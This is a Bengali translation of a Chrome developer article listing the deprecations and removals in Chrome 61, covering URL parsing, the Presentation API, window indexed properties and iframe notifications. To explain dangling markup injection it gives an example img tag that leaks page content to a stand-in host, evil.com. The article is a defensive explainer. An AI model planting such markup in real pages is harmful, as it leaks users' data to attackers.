Chrome-এর প্রায় প্রতিটি সংস্করণে, আমরা পণ্য, এর কার্যকারিতা এবং ওয়েব প্ল্যাটফর্মের ক্ষমতার উল্লেখযোগ্য সংখ্যক আপডেট এবং উন্নতি দেখতে পাই। এই নিবন্ধটি Chrome 61-এ অবচয় এবং অপসারণের বর্ণনা দেয়, যা 3 অগাস্ট পর্যন্ত বিটাতে রয়েছে। এই তালিকা যেকোন সময় পরিবর্তন হতে পারে।
নিরাপত্তা এবং গোপনীয়তা
যে সকল ইউআরএলে '\n' এবং '<' অক্ষর রয়েছে সেগুলোকে ব্লক করুন
ড্যাংলিং মার্কআপ ইনজেকশন নামে এক ধরনের হ্যাকিং আছে যেখানে একটি ছেঁটে দেওয়া URL একটি বাহ্যিক এন্ডপয়েন্টে ডেটা পাঠাতে ব্যবহৃত হয়। উদাহরণস্বরূপ, <img src='https://evil.com/?
. যেহেতু URL-এর কোনো সমাপনী উদ্ধৃতি নেই, তাই ব্রাউজারগুলি পরবর্তী উদ্ধৃতিটি পড়বে এবং আবদ্ধ অক্ষরগুলিকে এমনভাবে ব্যবহার করবে যেন এটি একটি একক URL।
Chrome 61 href
এবং src
অ্যাট্রিবিউটে অনুমোদিত অক্ষর সেটগুলিকে সীমাবদ্ধ করে এই দুর্বলতা প্রশমিত করে৷ বিশেষত, Chrome নতুন লাইন অক্ষর ( \n
) এবং অক্ষর ( <
) এর থেকে কম হলে URL-এর প্রক্রিয়াকরণ বন্ধ করবে।
নতুন লাইনের জন্য একটি বৈধ ব্যবহারের ক্ষেত্রে এবং একটি URL-এ অক্ষরের চেয়ে কম বিকাশকারীদের এই অক্ষরগুলি এড়িয়ে যাওয়া উচিত।
অপসারণ করার অভিপ্রায় | Chromestatus ট্র্যাকার | ক্রোমিয়াম বাগ
অনিরাপদ প্রেক্ষাপটে উপস্থাপনা এপিআই অবমূল্যায়ন করুন এবং সরান
এটি পাওয়া গেছে যে অনিরাপদ উত্সগুলিতে, উপস্থাপনা API অনিরাপদ উত্সগুলিতে একটি হ্যাকিং ভেক্টর হিসাবে ব্যবহার করা যেতে পারে৷ যেহেতু ডিসপ্লেতে অ্যাড্রেস বার নেই তাই এপিআই কন্টেন্ট স্পুফ করতে ব্যবহার করা যেতে পারে। চলমান উপস্থাপনা থেকে ডেটা উত্তোলন করাও সম্ভব।
অনিরাপদ উত্সের শক্তিশালী বৈশিষ্ট্যগুলি সরানোর জন্য ব্লিঙ্কের অভিপ্রায়ের সাথে সারিবদ্ধভাবে, আমরা অনিরাপদ প্রসঙ্গে উপস্থাপনা API-এর সমর্থনকে অবমূল্যায়ন এবং অপসারণের পরিকল্পনা করি৷ Chrome 61 থেকে শুরু করে, PresentationRequest.start()
আর অনিরাপদ উত্সগুলিতে কাজ করবে না৷
অপসারণ করার অভিপ্রায় | Chromestatus ট্র্যাকার | ক্রোমিয়াম বাগ
জাভাস্ক্রিপ্ট
উইন্ডোতে সূচীকৃত বৈশিষ্ট্যের সংজ্ঞা অনুমোদন না করুন
পূর্বে কিছু ব্রাউজার নিম্নলিখিত মত জাভাস্ক্রিপ্ট অ্যাসাইনমেন্টের জন্য অনুমোদিত:
window[0] = 1;
বর্তমান এইচটিএমএল স্পেস নোট করে যে এটি জাভাস্ক্রিপ্ট স্পেকের একটি সুস্পষ্ট লঙ্ঘন। যেমন, Chrome 61-এ এই ক্ষমতাটি সরিয়ে দেওয়া হয়েছে। ফেব্রুয়ারি 2016 থেকে, Firefox ইতিমধ্যেই মেনে চলছে।
অনিরাপদ আইফ্রেম থেকে বিজ্ঞপ্তির ব্যবহার সরান
iframes থেকে অনুমতির অনুরোধ ব্যবহারকারীদের বিভ্রান্ত করতে পারে কারণ পৃষ্ঠার উত্স এবং অনুরোধ করা আইফ্রেমের উত্সের মধ্যে পার্থক্য করা কঠিন৷ যখন অনুরোধের সুযোগ অস্পষ্ট হয়, ব্যবহারকারীদের পক্ষে অনুমতি দেওয়া বা অস্বীকার করা যায় কিনা তা বিচার করা কঠিন।
আইফ্রেমে নোটিফিকেশনের অনুমতি না দিলে তা পুশ নোটিফিকেশনের সাথে নোটিফিকেশনের অনুমতির প্রয়োজনীয়তাগুলিকে সারিবদ্ধ করবে, ডেভেলপারদের জন্য ঘর্ষণ সহজ করবে।
বিকাশকারীরা যাদের এই কার্যকারিতা প্রয়োজন তারা বিজ্ঞপ্তি অনুমতির জন্য অনুরোধ করতে একটি নতুন উইন্ডো খুলতে পারে।
অপসারণ করার অভিপ্রায় | Chromestatus ট্র্যাকার | ক্রোমিয়াম বাগ